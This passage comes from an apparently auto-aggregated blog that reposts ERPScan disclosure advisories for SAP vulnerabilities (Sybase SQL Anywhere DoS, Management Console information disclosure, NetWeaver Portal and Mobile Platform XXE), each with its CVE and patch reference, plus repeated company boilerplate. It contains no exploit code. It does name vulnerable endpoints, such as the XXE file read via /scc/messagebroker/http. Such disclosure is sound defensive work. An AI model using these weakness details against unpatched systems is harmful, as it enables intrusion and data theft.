in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-010] SYBASE SQL Anywhere 12 and 16 - DoS

ERPSCAN Research Advisory [ERPSCAN-15-010] SYBASE SQL Anywhere 12 and 16 - DoS Application: SYBASE SQL Anywhere 12 and 16 Versions Affected: SYBASE SQL Anywhere 12 and 16, probably others Vendor URL: http://SAP.com Bugs: DoS Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 Reference: SAP Security Note 2108161 Author: Vahagn Vardanyan (ERPScan) Description 1. ADVISORY INFORMATION Title: SYBASE SQL Anywhere 12 and 16 - DoS Advisory ID: [ERPSCAN-15-010] Risk: High Advisory URL: http://ift.tt/1Fzwimo Date published: 15.03.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: DoS [CWE-122] Impact: DoS Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2819 3. VULNERABILITY DESCRIPTION An attacker can trigger a condition in which the process ceases to run. This condition can be intentionally provoked by an attacker to cause denial of service. 4. VULNERABLE PACKAGES SYBASE SQL Anywhere 12 and 16 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2108161. 6. AUTHOR Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server. 8. REPORT TIMELINE Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 9. REFERENCES http://ift.tt/1Fzwimo 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-009] SAP Afaria 7 XcListener - Missing authorization check

[FD] ERPSCAN Research Advisory [ERPSCAN-15-008] SAP Afaria 7 XcListener - DoS in the module XeClient.Dll

[FD] ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure

ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure Application: SAP Management Console Versions Affected: SAP NW 7.4 Management Console, probably others Vendor URL: http://SAP.com Bugs: Information disclosure Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 Reference: SAP Security Note 2091768 Author: Dmitry Chastukhin (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP Management Console ReadProfile Parameters - information disclosure Advisory ID: [ERPSCAN-15-007] Risk: High Advisory URL: http://ift.tt/1GFy2yF Date published: 15.03.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Information disclosure [CWE-200] Impact: Information disclosure Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2817 3. VULNERABILITY DESCRIPTION It is possible to get some information from the web interface of CCMS without authentication. An attacker can use the information for subsequent attacks which will lead to illegal access to business-critical information. 4. VULNERABLE PACKAGES SAP NetWeaver 7.40 (sapstartsrv.exe, version v7400.12.21.30308). Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Install SAP Security Note 2091768 or upgrade kernel to the associated patch level. 6. AUTHOR Dmitry Chastukhin (ERPScan) 7. TECHNICAL DESCRIPTION An anonymous attacker can send a special POST HTTP request to get information about any SAP profile parameters. 8. REPORT TIMELINE Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 9. REFERENCES http://ift.tt/1GFy2yF 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE

ERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE Application: SAP NetWeaver Portal 7.31 Versions Affected: SAP NetWeaver Portal 7.31, probably others Vendor URL: http://SAP.com Bugs: XXE Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 Reference: SAP Security Note 2111939 Author: Vahagn Vardanyan (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP NetWeaver Portal ReportXmlViewer - XXE Advisory ID: [ERPSCAN-15-006] Risk: High Advisory URL: http://ift.tt/1Hd0v0c Date published: 15.03.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: XXE [CWE-122] Impact: XML external entity, information disclosure, denial of service, role upload, thread reporting Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2811 3. VULNERABILITY DESCRIPTION By default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed. This malicious content can reference internal resources, such as files. These internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable. 4. VULNERABLE PACKAGES SAP NetWeaver Portal 7.31 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2111939. 6. AUTHOR Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION SAP XML parser validates all incoming XML requests with a user-specified DTD. 8. REPORT TIMELINE Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015 9. REFERENCES http://ift.tt/1Hd0v0c 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-005] SAP Mobile Platform - XXE

ERPSCAN Research Advisory [ERPSCAN-15-005] SAP Mobile Platform - XXE Application: SAP Mobile Platform 2.3 Versions Affected: SAP Mobile Platform 2.3, probably others Vendor URL: http://SAP.com Bugs: XML eXternal Entity Sent: 06.11.14 Reported: 06.11.14 Vendor response: 07.11.14 Date of Public Advisory: 18.06.2015 Reference: SAP Security Note 2125358 Author: Dmitry Chastukhin (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP Mobile Platform 2.3 Advisory ID: [ERPSCAN-15-005] Risk: High Advisory URL: http://ift.tt/1GFy1e2 Date published: 15.02.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-611] Impact: information disclosure, denial of service, read file Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2813 3. VULNERABILITY DESCRIPTION 1) An attacker can read an arbitrary file on the server by sending a correct XML request with a crafted DTD to/scc/messagebroker/http and reading the reply from the service. 2) An attacker can perform a DoS attack (for example, an XML Entity Expansion attack) 3) A SMB Relay attack is a type of Man-in-the-Middle attack where the attacker asks the victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving them access. 4. VULNERABLE PACKAGES SAP Mobile Platform 2.2 SAP Mobile Platform 2.3 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2125358 or: * Upgrade your existing SMP 2.2 installation to SMP 2.2 SP06 PL02 * Upgrade your existing SMP 2.3 installatoin to SMP 2.3 SP05 PL01 6. AUTHOR Dmitry Chastuin (ERPScan) 7. TECHNICAL DESCRIPTION SAP XML parser (/scc/messagebroker/http) validates all incoming XML requests with a user-specified DTD. 8. REPORT TIMELINE Sent: 06.11.14 Reported: 07.11.14 Vendor response: 07.11.14 Date of Public Advisory: 18.06.2015 9. REFERENCES http://ift.tt/1GFy1e2 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger